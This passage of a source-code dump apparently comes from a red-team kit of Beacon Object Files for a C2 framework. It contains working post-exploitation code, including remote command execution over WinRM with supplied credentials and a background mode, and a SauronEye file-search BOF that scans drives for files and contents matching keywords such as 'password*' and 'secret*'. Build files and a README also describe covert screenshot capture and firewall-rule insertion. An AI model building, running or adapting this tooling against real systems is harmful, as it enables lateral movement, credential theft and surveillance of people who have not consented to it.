            BeaconPrintf(CALLBACK_OUTPUT, "[*] Using explicit credentials: %S\n", username);
        } else {
            serverAuthenticationCredentials.authenticationMechanism = WSMAN_FLAG_DEFAULT_AUTHENTICATION;
        }

        DWORD ret = WSManInitialize(WSMAN_FLAG_REQUESTED_API_VERSION_1_0, &hApi);
        if (ret != NO_ERROR) {
            BeaconPrintf(CALLBACK_ERROR, "Error WSManInitialize: %d\n", ret);
            goto deInitialize;
        }

        ret = WSManCreateSession(hApi, connection, 0, &serverAuthenticationCredentials, NULL, &hSession);
        if (ret != NO_ERROR) {
            BeaconPrintf(CALLBACK_ERROR, "error WSManCreateSesdsion: %d\n", ret);
            goto closeSession;
        }

        hEventShellCompl = CreateEventW(NULL, FALSE, FALSE, NULL);
        if (hEventShellCompl == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "error CreateEventW: %d\n", GetLastError());
            goto closeSession;
        }

        ctxCreateShell.event = hEventShellCompl;
        ctxCreateShell.hadError = FALSE;
        wsAsync.operationContext = &ctxCreateShell;
        wsAsync.completionFunction = &WSManShellCompletionFunction;

        WSManCreateShell(hSession, 0, WSMAN_CMDSHELL_URI, NULL, NULL, NULL, &wsAsync, &hShell);
        WaitForSingleObject(hEventShellCompl, 15000);
        if (ctxCreateShell.hadError)
            goto closeShell;


        WSManRunShellCommand(hShell, 0, commandLine, NULL, NULL, &wsAsync, &hCmd);
        WaitForSingleObject(hEventShellCompl, 15000);
        if (ctxCreateShell.hadError)
            goto closeCommand;

        if (background) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] WinRM command launched in background (session kept open)\n");
            goto backgroundDone;
        }

        hEventReceive = CreateEventW(NULL, FALSE, NULL, NULL);
        if (hEventReceive == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "error CreateEventW: %d\n", GetLastError());
            goto closeCommand;
        }
        ctxReceiveShell.event = hEventReceive;
        ctxReceiveShell.commandDone = FALSE;
        wsAsyncShell.operationContext = &ctxReceiveShell;
        wsAsyncShell.completionFunction = &ReceiveCallback;

        WSManReceiveShellOutput(hShell, hCmd, 0, NULL, &wsAsyncShell, &receiveOperation);
        waitResult = WaitForSingleObject(hEventReceive, receiveWaitMs);
        if (waitResult == WAIT_TIMEOUT) {
            BeaconPrintf(CALLBACK_ERROR, "WinRM receive timeout after %lu ms (command may still be running). Use -t 0 to wait indefinitely or -b for background.\n", receiveWaitMs);
        }

        ret = WSManCloseOperation(receiveOperation, 0);
        if (ret != NO_ERROR) BeaconPrintf(CALLBACK_ERROR, "error WSManCloseOperation: %ld\n", ret);

        goto closeCommand;



    backgroundDone:
        if (hEventReceive != NULL)
            CloseHandle(hEventReceive);
        if (hEventShellCompl != NULL)
            CloseHandle(hEventShellCompl);
        return;

    closeCommand:
        WSManCloseCommand(hCmd, 0, &wsAsync);
        WaitForSingleObject(hEventShellCompl, 15000);

    closeShell:
        WSManCloseShell(hShell, 0, &wsAsync);
        WaitForSingleObject(hEventShellCompl, 15000);

    closeSession:
        ret = WSManCloseSession(hSession, 0);
        if (ret != NO_ERROR) BeaconPrintf(CALLBACK_ERROR, "error WSManCloseSession: %ld\n", ret);

    deInitialize:
        ret = WSManDeinitialize(hApi, 0);
        if (ret != NO_ERROR) BeaconPrintf(CALLBACK_ERROR, "error WSManDeinitialize: %ld\n", ret);

        if (hEventReceive != NULL)
            CloseHandle(hEventReceive);
        if (hEventShellCompl != NULL)
            CloseHandle(hEventShellCompl);
    }
}

================================================
FILE: Makefile
================================================
SUBDIRS := AD-BOF Creds-BOF Elevation-BOF Execution-BOF Injection-BOF LateralMovement-BOF Postex-BOF Process-BOF SAL-BOF SAR-BOF

.PHONY: all $(SUBDIRS) clean docker-build

all: $(SUBDIRS)
$(SUBDIRS):
	@echo "=====>>  $@"
	@$(MAKE) --no-print-directory -C $@
	@echo ""

clean:
	@for dir in $(SUBDIRS); do \
		$(MAKE) --no-print-directory -C $$dir clean; \
	done

docker-build:
	docker compose build --no-cache && docker compose run bof-build

================================================
FILE: Postex-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Postex-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(SCREENSHOT_SOURCES ScreenshotBOF/entry.c)
set(ADDFIREWALLRULE_SOURCES firewallrule/addfirewallrule.c)
set(SAURONEYE_SOURCES SauronEyeBOF/entry.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-int-conversion -Wno-incompatible-pointer-types")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(Screenshot OBJECT ${SCREENSHOT_SOURCES})
add_library(addfirewallrule OBJECT ${ADDFIREWALLRULE_SOURCES})
add_library(sauroneye OBJECT ${SAURONEYE_SOURCES})

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_Screenshot ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:Screenshot> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Screenshot.x64.o
    DEPENDS Screenshot
    COMMENT "Copying Screenshot object file"
)

add_custom_target(copy_addfirewallrule ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:addfirewallrule> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/addfirewallrule.x64.o
    DEPENDS addfirewallrule
    COMMENT "Copying addfirewallrule object file"
)

add_custom_target(copy_sauroneye ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:sauroneye> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/sauroneye.x64.o
    DEPENDS sauroneye
    COMMENT "Copying sauroneye object file"
)


================================================
FILE: Postex-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -DBOF -s -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	# 64-bit builds
	@($(CC64) $(CFLAGS) ScreenshotBOF/entry.c -o _bin/Screenshot.x64.o && $(STRIP64) _bin/Screenshot.x64.o) && echo '[+] Screenshot (x64)' || echo '[!] Screenshot (x64)'
	@($(CC64) $(CFLAGS) firewallrule/addfirewallrule.c -o _bin/addfirewallrule.x64.o && $(STRIP64) _bin/addfirewallrule.x64.o) && echo '[+] addfirewallrule (x64)' || echo '[!] addfirewallrule (x64)'
	@($(CC64) $(CFLAGS) SauronEyeBOF/entry.c -o _bin/sauroneye.x64.o && $(STRIP64) _bin/sauroneye.x64.o) && echo '[+] sauroneye (x64)' || echo '[!] sauroneye (x64)'
	# 32-bit builds
	@($(CC86) $(CFLAGS) ScreenshotBOF/entry.c -o _bin/Screenshot.x32.o && $(STRIP86) _bin/Screenshot.x32.o) && echo '[+] Screenshot (x32)' || echo '[!] Screenshot (x32)'
	@($(CC86) $(CFLAGS) firewallrule/addfirewallrule.c -o _bin/addfirewallrule.x32.o && $(STRIP86) _bin/addfirewallrule.x32.o) && echo '[+] addfirewallrule (x32)' || echo '[!] addfirewallrule (x32)'
	@($(CC86) $(CFLAGS) SauronEyeBOF/entry.c -o _bin/sauroneye.x32.o && $(STRIP86) _bin/sauroneye.x32.o) && echo '[+] sauroneye (x32)' || echo '[!] sauroneye (x32)'

clean:
	@(rm -rf _bin)


================================================
FILE: Postex-BOF/README.md
================================================
# PostEx-BOF

This extension allows you to customize the Beacon Object File (BOF) for future use.

![](_img/01.png)



## firewallrule

A BOF tool that can be used to add a new inbound or outbound firewall rule using COM.

```
firewallrule add <port> <rulename> [direction] [-g rulegroup] [-d description]
```



## ScreenshotBOF

An alternative screenshot capability that uses WinAPI and does not perform a fork & run:
- JPEG is used in place of BMP
- Added beacon screenshot callback option
- Removed BMP renderer (it will be missed)
- Supports capturing of minimized windows

The screenshot will be saved in the AdaptixC2 screenshot storage.

```
screenshot_bof [-n note] [-p pid]
```

The **Screenshot** item will be added to the **Access** menu in the Sessions Table and Graph.

![](_img/02.png)



## SauronEyeBOF

A file search tool ported from SauronEye to BOF format. Searches directories for files containing specific keywords:
- Search files by name patterns (supports wildcards * )
- Search file contents for keywords (with `-c` flag, supports wildcards * )
- Filter by file extensions
- Filter by file modification date
- Exclude system directories (Windows, AppData, Program Files)
- Configurable max file size

```
sauroneye [-d directories] [-f filetypes] [-k keywords] [-c] [-m maxfilesize] [-s] [-b beforedate] [-a afterdate] [-v] [-D] [-W wildcardattempts] [-S wildcardsize] [-B wildcardbacktrack]
```

Options:
- `-d directories`: Comma-separated list of directories to search (default: C:\)
- `-f filetypes`: Comma-separated list of file extensions (default: .txt,.docx)
- `-k keywords`: Comma-separated list of keywords with wildcards (default: none - matches all filenames). Used for searching in filenames and/or file contents
- `-c`: Search file contents for keywords. When enabled, searches inside files for keywords in addition to searching filenames
- `-m maxfilesize`: Max file size in KB for content search (default: 1024)
- `-s`: Search in system directories (default: false)
- `-b beforedate`: Filter files modified before date (format: dd.MM.yyyy)
- `-a afterdate`: Filter files modified after date (format: dd.MM.yyyy)
- `-v`: Check for VBA macros in Office files using OOXML detection (no OLE, stealthier)
- `-D`: Show file creation and modification dates in output. Format: `[C:dd.MM.yyyy M:dd.MM.yyyy]` where C: is creation date and M: is modification date
- `-W wildcardattempts`: Maximum pattern matching attempts for wildcard search (default: 1000). Increase for complex patterns
- `-S wildcardsize`: Maximum search area in KB for large files when using wildcards (default: 200KB). Increase to search more of large files
- `-B wildcardbacktrack`: Maximum backtracking operations for wildcard matching (default: 1000). Increase for complex patterns

Examples:
```
# Search only on C:\ drive (default)
sauroneye -f .docx
# Search on multiple drives
sauroneye -d C:\,D:\ -f .txt,.docx -k secret*,password*
# Search specific directories
sauroneye -d C:\Users,D:\Documents,E:\Backup -f .txt,.docx,.xlsx -k pass*,secret* -b 2024-01-01
```


## Credits
* ScreenshotBOF - https://github.com/CodeXTF2/ScreenshotBOF
* OperatorsKit - https://github.com/REDMED-X/OperatorsKit
* SauronEye-BOF - https://github.com/shashinma/SauronEye-BOF

================================================
FILE: Postex-BOF/SauronEyeBOF/entry.c
================================================
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "sauroneye.h"
#include "beacon.h"


static BOOL buffer_contains(const char* buf, DWORD len, const char* pat) {
    if (!buf || !pat) return FALSE;
    size_t plen = MSVCRT$strlen(pat);
    if (plen == 0 || len < (DWORD)plen) return FALSE;
    const unsigned char first = (unsigned char)pat[0];
    const DWORD max_pos = len - (DWORD)plen;
    for (DWORD i = 0; i <= max_pos; i++) {
        if ((unsigned char)buf[i] == first) {
            if (plen > 1 && (unsigned char)buf[i + plen - 1] != (unsigned char)pat[plen - 1]) {
                continue;
            }
            DWORD j = 1;
            for (; j < plen - 1; j++) {
                if ((unsigned char)buf[i + j] != (unsigned char)pat[j]) break;
            }
            if (j == plen - 1) return TRUE;
        }
    }
    return FALSE;
}
BOOL CheckForVBAMacrosStrict(const char* filepath, BOOL use_ole) {
    (void)use_ole;
    if (!filepath) return FALSE;
    HANDLE h = KERNEL32$CreateFileA(filepath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) return FALSE;
    FILE_STANDARD_INFORMATION finfo = {0};
    IO_STATUS_BLOCK ios = {0};
    if (NTDLL$NtQueryInformationFile(h, &ios, &finfo, sizeof(finfo), FileStandardInformation) != 0 || finfo.EndOfFile.QuadPart == 0) {
        KERNEL32$CloseHandle(h);
        return FALSE;
    }
    ULONGLONG total = (ULONGLONG)finfo.EndOfFile.QuadPart;
    DWORD win = (DWORD)((total > OOXML_SCAN_WINDOW) ? OOXML_SCAN_WINDOW : total);
    char* buf = (char*)MSVCRT$malloc(win);
    if (!buf) { KERNEL32$CloseHandle(h); return FALSE; }
    LARGE_INTEGER off = {0};
    ios.Status = ios.Information = 0;
    BOOL isZip = FALSE, anyHit = FALSE;
    if (NTDLL$NtReadFile(h, NULL, NULL, NULL, &ios, buf, win, &off, NULL) == 0 && ios.Information >= 4) {
        isZip = (buf[0] == 'P' && buf[1] == 'K');
        anyHit = buffer_contains(buf, (DWORD)ios.Information, "vbaProject.bin");
        if (!anyHit && total > win) {
            off.QuadPart = (LONGLONG)(total - win);
            ios.Status = ios.Information = 0;
            if (NTDLL$NtReadFile(h, NULL, NULL, NULL, &ios, buf, win, &off, NULL) == 0 && ios.Information >= 4) {
                if (!isZip) isZip = (buf[0] == 'P' && buf[1] == 'K');
                anyHit = buffer_contains(buf, (DWORD)ios.Information, "vbaProject.bin");
            }
        }
    }
    MSVCRT$free(buf);
    KERNEL32$CloseHandle(h);
    return (isZip && anyHit);
}
BOOL MatchWildcard(const char* pattern, const char* str) {
    const char* s = str;
    const char* p = pattern;
    const char* star = NULL;
    const char* ss = NULL;
    while (*s) {
        if (*p == '?' || MSVCRT$tolower(*p) == MSVCRT$tolower(*s)) { s++; p++; continue; }
        if (*p == '*') { star = p++; ss = s; continue; }
        if (star) { p = star + 1; s = ++ss; continue; }
        return FALSE;
    }
    while (*p == '*') p++;
    return !*p;
}
static BOOL HasWildcard(const char* str) {
    if (!str) return FALSE;
    for (const char* p = str; *p; p++) {
        if (*p == '*' || *p == '?') return TRUE;
    }
    return FALSE;
}
static BOOL IsAlphanumeric(char c) {
    return ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9'));
}
static BOOL IsWordBoundary(const char* matchStart, const char* matchEnd, const char* buffer, DWORD bufferLen, const char* pattern) {
    const char* patternEnd = pattern + MSVCRT$strlen(pattern);
    const char* p = patternEnd - 1;
    BOOL endsWithStar = FALSE;
    while (p >= pattern && (*p == '*' || *p == '?')) {
        if (*p == '*') {
            endsWithStar = TRUE;
        }
        p--;
    }
    if (endsWithStar) return TRUE;
    BOOL startsWithWildcard = (*pattern == '*' || *pattern == '?');
    if (!startsWithWildcard && matchStart > buffer) {
        char prevChar = matchStart[-1];
        if (IsAlphanumeric(prevChar)) return FALSE;
    }
    if (matchEnd < buffer + bufferLen) {
        char nextChar = *matchEnd;
        if (IsAlphanumeric(nextChar)) return FALSE;
    }
    return TRUE;
}
BOOL MatchesKeyword(const char* filename, SearchOptions* opts) {
    if (opts->keyword_count == 0) return TRUE;
    const char* ext = MSVCRT$strrchr(filename, '.');
    size_t nameLen = ext ? (size_t)(ext - filename) : MSVCRT$strlen(filename);
    char* nameWithoutExt = (char*)MSVCRT$malloc(nameLen + 1);
    if (!nameWithoutExt) return FALSE;
    MSVCRT$memcpy(nameWithoutExt, filename, nameLen);
    nameWithoutExt[nameLen] = '\0';
    for (int i = 0; i < opts->keyword_count; i++) {
        const char* kw = opts->keywords[i];
        if (!kw) continue;
        if (HasWildcard(kw)) {
            if (MatchWildcard(kw, nameWithoutExt)) {
                MSVCRT$free(nameWithoutExt);
                return TRUE;
            }
        } else {
            size_t kwlen = MSVCRT$strlen(kw);
            if (nameLen == kwlen) {
                BOOL match = TRUE;
                for (size_t j = 0; j < kwlen; j++) {
                    if (MSVCRT$tolower((unsigned char)filename[j]) != MSVCRT$tolower((unsigned char)kw[j])) {
                        match = FALSE;
                        break;
                    }
                }
                if (match) {
                    MSVCRT$free(nameWithoutExt);
                    return TRUE;
                }
            }
        }
    }
    MSVCRT$free(nameWithoutExt);
    return FALSE;
}
BOOL MatchesFiletype(const char* filepath, SearchOptions* opts) {
    const char* ext = MSVCRT$strrchr(filepath, '.');
    if (!ext) return FALSE;
    for (int i = 0; i < opts->filetype_count; i++) {
        if (opts->filetypes[i] && MSVCRT$_stricmp(ext, opts->filetypes[i]) == 0) return TRUE;
    }
    return FALSE;
}
BOOL IsFolderValid(const char* path, SearchOptions* opts) {
    if (opts->system_dirs) return TRUE;
    const char* p = path;
    while (*p) {
        if (*p == ':' && (p[1] == '\\')) {
            const char* check = p + (p[2] == '\\' ? 3 : 2);
            if (MSVCRT$strncmp(check, "Windows", 7) == 0 && (check[7] == '\0' || check[7] == '\\')) return FALSE;
            if (MSVCRT$strncmp(check, "Program Files", 13) == 0) {
                check += 13;
                while (*check == '\\') check++;
                if (*check == '\0' || *check == ' ') return FALSE;
            }
            if (MSVCRT$strncmp(check, "Users", 5) == 0) {
                check += 5;
                while (*check == '\\') check++;
                if (MSVCRT$strstr(check, "AppData")) return FALSE;
            }
        }
        p++;
    }
    return TRUE;
}
static void FormatFileDate(const FILETIME* creationTime, const FILETIME* modificationTime, char* dateStr, size_t dateStrSize) {
    SYSTEMTIME st_creation, st_modification;
    KERNEL32$FileTimeToSystemTime(creationTime, &st_creation);
    KERNEL32$FileTimeToSystemTime(modificationTime, &st_modification);
    MSVCRT$_snprintf(dateStr, dateStrSize, "[C:%02d.%02d.%04d M:%02d.%02d.%04d]",
        st_creation.wDay, st_creation.wMonth, st_creation.wYear,
        st_modification.wDay, st_modification.wMonth, st_modification.wYear);
}
static BOOL OutputSearchResult(const char* filepath, const FILETIME* filetime, const char* matchStart, const char* matchEnd, const char* lowercaseBuffer, const char* originalBuffer, DWORD bufferLen, SearchOptions* opts, DWORD* seenOffsets, int* seenOffsetsCount, int seenOffsetsCapacity) {
    if (!opts) return FALSE;

    size_t len = MSVCRT$strlen(filepath);
    char* normalized = (char*)MSVCRT$malloc(len + 1);
    if (!normalized) {
        normalized = (char*)filepath; // Fallback to original path
    } else {
        MSVCRT$memcpy(normalized, filepath, len + 1);
        NormalizePath(normalized);
    }

    BOOL alreadySeen = IsPathAlreadySeen(normalized, opts);

    // Check if this match position was already output
    if (matchStart && matchEnd && seenOffsets && seenOffsetsCount) {
        size_t matchStartOffset = matchStart - lowercaseBuffer;
        size_t matchEndOffset = matchEnd - lowercaseBuffer;
        // Check if we've already output a match at this exact position or overlapping position
        for (int i = 0; i < *seenOffsetsCount; i++) {
            // Check if positions overlap (within a small tolerance to account for context differences)
            DWORD startDiff = (matchStartOffset > seenOffsets[i]) ? (matchStartOffset - seenOffsets[i]) : (seenOffsets[i] - matchStartOffset);
            if (startDiff <= CONTEXT_BUFFER_SIZE) {
                // This match overlaps with an already output match, skip it
                if (normalized != filepath) MSVCRT$free(normalized);
                return FALSE;
            }
        }
        // Add this position to seen offsets
        if (*seenOffsetsCount < seenOffsetsCapacity) {
            seenOffsets[*seenOffsetsCount] = (DWORD)matchStartOffset;
            (*seenOffsetsCount)++;
        }
    }

    char dateStr[35] = {0};
    if (opts->show_date && filetime) {
        WIN32_FILE_ATTRIBUTE_DATA fileInfo;
        FILETIME creationTime = *filetime;
        if (KERNEL32$GetFileAttributesExA(filepath, GetFileExInfoStandard, &fileInfo)) {
            creationTime = fileInfo.ftCreationTime;
        }
        FormatFileDate(&creationTime, filetime, dateStr, sizeof(dateStr));
    }

    // If file was already seen and we have a match, only output the match context
    if (alreadySeen && matchStart && matchEnd && originalBuffer) {
        size_t matchStartOffset = matchStart - lowercaseBuffer;
        size_t matchEndOffset = matchEnd - lowercaseBuffer;
        size_t contextStartOffset = (matchStartOffset < CONTEXT_BUFFER_SIZE) ? 0 : matchStartOffset - CONTEXT_BUFFER_SIZE;
        size_t contextEndOffset = (matchEndOffset + CONTEXT_BUFFER_SIZE > bufferLen) ? bufferLen : matchEndOffset + CONTEXT_BUFFER_SIZE;
        size_t ctxLen = contextEndOffset - contextStartOffset;
        char* ctx = (char*)MSVCRT$malloc(ctxLen + 1);
        if (ctx) {
            MSVCRT$memcpy(ctx, originalBuffer + contextStartOffset, ctxLen);
            ctx[ctxLen] = '\0';
            BeaconPrintf(CALLBACK_OUTPUT, "\t ...%s...\n", ctx);
            MSVCRT$free(ctx);
        }
        if (normalized != filepath) MSVCRT$free(normalized);
        return TRUE;
    }

    // If file was already seen and no match, skip
    if (alreadySeen) {
        if (normalized != filepath) MSVCRT$free(normalized);
        return FALSE;
    }

    // File not seen yet - output full result
    if (matchStart && matchEnd && originalBuffer) {
        size_t matchStartOffset = matchStart - lowercaseBuffer;
        size_t matchEndOffset = matchEnd - lowercaseBuffer;
        size_t contextStartOffset = (matchStartOffset < CONTEXT_BUFFER_SIZE) ? 0 : matchStartOffset - CONTEXT_BUFFER_SIZE;
        size_t contextEndOffset = (matchEndOffset + CONTEXT_BUFFER_SIZE > bufferLen) ? bufferLen : matchEndOffset + CONTEXT_BUFFER_SIZE;
        size_t ctxLen = contextEndOffset - contextStartOffset;
        char* ctx = (char*)MSVCRT$malloc(ctxLen + 1);
        if (ctx) {
            MSVCRT$memcpy(ctx, originalBuffer + contextStartOffset, ctxLen);
            ctx[ctxLen] = '\0';
            if (opts->show_date && dateStr[0]) {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s %s:\n\t ...%s...\n", dateStr, normalized, ctx);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s:\n\t ...%s...\n", normalized, ctx);
            }
            MSVCRT$free(ctx);
        } else {
            if (opts->show_date && dateStr[0]) {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s %s\n", dateStr, normalized);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s\n", normalized);
            }
        }
    } else {
        if (opts->show_date && dateStr[0]) {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s %s\n", dateStr, normalized);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %s\n", normalized);
        }
    }

    AddPathToSeen(normalized, opts);
    if (normalized != filepath) MSVCRT$free(normalized);
    return TRUE;
}
BOOL MatchesDateFilter(const FILETIME* filetime, SearchOptions* opts) {
    if (!opts->has_date_filter) return TRUE;
    SYSTEMTIME st;
    KERNEL32$FileTimeToSystemTime(filetime, &st);
    int file_date = st.wYear * 10000 + st.wMonth * 100 + st.wDay;
    if (opts->before_date.wYear != 0) {
        int before = opts->before_date.wYear * 10000 + opts->before_date.wMonth * 100 + opts->before_date.wDay;
        return file_date < before;
    }
    if (opts->after_date.wYear != 0) {
        int after = opts->after_date.wYear * 10000 + opts->after_date.wMonth * 100 + opts->after_date.wDay;
        return file_date > after;
    }
    return TRUE;
}
int SearchFileContents(const char* filepath, const FILETIME* filetime, SearchOptions* opts) {
    if (!opts->search_contents || opts->keyword_count == 0) {
        return 0;
    }
    HANDLE hFile = KERNEL32$CreateFileA(filepath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return 0;
    }
    DWORD fileSizeHigh = 0;
    DWORD fileSize = KERNEL32$GetFileSize(hFile, &fileSizeHigh);
    ULONGLONG totalSize = ((ULONGLONG)fileSizeHigh << 32) | fileSize;
    if (totalSize > MAX_CONTENT_BUFFER_SIZE || totalSize == 0) {
        KERNEL32$CloseHandle(hFile);
        return 0;
    }
    char* buffer = (char*)MSVCRT$malloc((size_t)totalSize + 1);
    if (!buffer) {
        KERNEL32$CloseHandle(hFile);
        return 0;
    }
    DWORD bytesRead = 0;
    if (!KERNEL32$ReadFile(hFile, buffer, (DWORD)totalSize, &bytesRead, NULL)) {
        MSVCRT$free(buffer);
        KERNEL32$CloseHandle(hFile);
        return 0;
    }
    buffer[bytesRead] = '\0';
    KERNEL32$CloseHandle(hFile);
    char* originalBuffer = (char*)MSVCRT$malloc((size_t)bytesRead + 1);
    if (!originalBuffer) {
        MSVCRT$free(buffer);
        return 0;
    }
    MSVCRT$memcpy(originalBuffer, buffer, (size_t)bytesRead + 1);
    for (DWORD i = 0; i < bytesRead; i++) {
        buffer[i] = (char)MSVCRT$tolower((unsigned char)buffer[i]);
    }
    char** lowerKeywords = (char**)MSVCRT$malloc(sizeof(char*) * opts->keyword_count);
    if (!lowerKeywords) { MSVCRT$free(buffer); MSVCRT$free(originalBuffer); return 0; }
    for (int i = 0; i < opts->keyword_count; i++) {
        const char* kw = opts->keywords[i];
        if (!kw) { lowerKeywords[i] = NULL; continue; }
        size_t len = MSVCRT$strlen(kw);
        lowerKeywords[i] = (char*)MSVCRT$malloc(len + 1);
        if (lowerKeywords[i]) {
            for (size_t j = 0; j < len; j++) lowerKeywords[i][j] = (char)MSVCRT$tolower((unsigned char)kw[j]);
            lowerKeywords[i][len] = '\0';
        } else {
            lowerKeywords[i] = NULL;
        }
    }
    // Track seen match offsets to avoid duplicate output
    DWORD* seenOffsets = (DWORD*)MSVCRT$malloc(sizeof(DWORD) * MAX_MATCHES_PER_FILE);
    int seenOffsetsCount = 0;
    int seenOffsetsCapacity = MAX_MATCHES_PER_FILE;
    if (!seenOffsets) {
        seenOffsetsCapacity = 0;
    }

    int totalMatches = 0;
    for (int i = 0; i < opts->keyword_count; i++) {
        const char* kw = opts->keywords[i];
        if (!kw || !lowerKeywords[i]) continue;
        if (HasWildcard(kw)) {
            size_t keywordLen = MSVCRT$strlen(kw);
            size_t bufferLen = bytesRead;
            char* lowerKeyword = lowerKeywords[i];
            const char* bufferEnd = buffer + bufferLen;
            const char* patternStart = lowerKeyword;
            BOOL startsWithWildcard = (*lowerKeyword == '*' || *lowerKeyword == '?');
            while (*patternStart == '*' || *patternStart == '?') {
                patternStart++;
            }
            const char* patternEnd = lowerKeyword + keywordLen - 1;
            BOOL endsWithStar = FALSE;
            while (patternEnd >= lowerKeyword && (*patternEnd == '*' || *patternEnd == '?')) {
                if (*patternEnd == '*') {
                    endsWithStar = TRUE;
                }
                patternEnd--;
            }
            if (!*patternStart) {
                const char* matchStart = buffer;
                const char* matchEnd = buffer + (bufferLen > 100 ? 100 : bufferLen);
                if (OutputSearchResult(filepath, filetime, matchStart, matchEnd, buffer, originalBuffer, (DWORD)bufferLen, opts, seenOffsets, &seenOffsetsCount, seenOffsetsCapacity)) {
                    totalMatches++;
                }
            } else {
                char firstChar = *patternStart;
                const char* searchStart = buffer;
                const char* maxSearchPos = bufferEnd;
                ULONGLONG maxSearchSize = (opts->wildcard_max_size > 0) ? opts->wildcard_max_size : WILDCARD_MAX_SEARCH_SIZE;
                if (bufferLen > maxSearchSize) {
                    maxSearchPos = buffer + (size_t)maxSearchSize;
                }
                int maxAttempts = (opts->wildcard_max_attempts > 0) ? opts->wildcard_max_attempts : WILDCARD_MAX_MATCH_ATTEMPTS;
                int attempts = 0;
                int matchCount = 0;
                while (searchStart < maxSearchPos && attempts < maxAttempts && matchCount < MAX_MATCHES_PER_FILE) {
                    while (searchStart < maxSearchPos && *searchStart != firstChar) {
                        searchStart++;
                    }
                    if (searchStart >= maxSearchPos) break;
                    size_t patternLen = MSVCRT$strlen(lowerKeyword);
                    size_t maxBackward = (patternLen < 100) ? patternLen : 100;
                    const char* tryStart = startsWithWildcard && (searchStart - buffer) > maxBackward
                        ? searchStart - maxBackward
                        : (startsWithWildcard ? buffer : searchStart);
                    BOOL foundMatch = FALSE;
                    for (const char* testStart = tryStart; testStart <= searchStart && matchCount < MAX_MATCHES_PER_FILE; testStart++) {
                        const char* p = lowerKeyword;
                        const char* t = testStart;
                        const char* lastStar = NULL;
                        const char* lastStarPos = NULL;
                        BOOL matched = TRUE;
                        int backtrackCount = 0;
                        int maxBacktrack = (opts->wildcard_max_backtrack > 0) ? opts->wildcard_max_backtrack : WILDCARD_MAX_BACKTRACK;
                        const char* firstLetterPos = NULL;
                        BOOL firstLetterFound = FALSE;
                        while (*p && t < maxSearchPos && backtrackCount < maxBacktrack) {
                            if (*p == '*') {
                                while (*p == '*') p++;
                                if (!*p) {
                                    const char* endPos = t;
                                    while (endPos < maxSearchPos && IsAlphanumeric(*endPos)) {
                                        endPos++;
                                    }
                                    const char* matchStartPos = firstLetterFound ? firstLetterPos : testStart;
                                    if (OutputSearchResult(filepath, filetime, matchStartPos, endPos, buffer, originalBuffer, (DWORD)bufferLen, opts, seenOffsets, &seenOffsetsCount, seenOffsetsCapacity)) {
                                        matchCount++;
                                        totalMatches++;
                                    }
                                    foundMatch = TRUE;
                                    matched = TRUE;
                                    break;
                                }
                                lastStar = p;
                                lastStarPos = t;
                            } else if (*p == '?' || *t == *p) {
                                if (!firstLetterFound && *p != '?') {
                                    firstLetterPos = t;
                                    firstLetterFound = TRUE;
                                }
                                p++;
                                t++;
                            } else if (lastStar) {
                                p = lastStar;
                                t = ++lastStarPos;
                                backtrackCount++;
                                firstLetterFound = FALSE;
                                firstLetterPos = NULL;
                            } else {
                                matched = FALSE;
                                break;
                            }
                        }
                        if (matched && !*p && t <= maxSearchPos) {
                            BOOL boundaryCheck = TRUE;
                            if (!endsWithStar) {
                                boundaryCheck = IsWordBoundary(testStart, t, buffer, (DWORD)bufferLen, lowerKeyword);
                            }
                            if (boundaryCheck) {
                                const char* endPos = t;
                                if (endsWithStar) {
                                    while (endPos < maxSearchPos && IsAlphanumeric(*endPos)) {
                                        endPos++;
                                    }
                                }
                                const char* matchStartPos = firstLetterFound ? firstLetterPos : testStart;
                                if (OutputSearchResult(filepath, filetime, matchStartPos, endPos, buffer, originalBuffer, (DWORD)bufferLen, opts, seenOffsets, &seenOffsetsCount, seenOffsetsCapacity)) {
                                    matchCount++;
                                    totalMatches++;
                                }
                                foundMatch = TRUE;
                            }
                        }
                    }
                    searchStart++;
                    attempts++;
                }
                if (matchCount >= MAX_MATCHES_PER_FILE) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[!] File %s: Reached maximum matches limit (%d) for pattern\n", filepath, MAX_MATCHES_PER_FILE);
                }
            }
        } else {
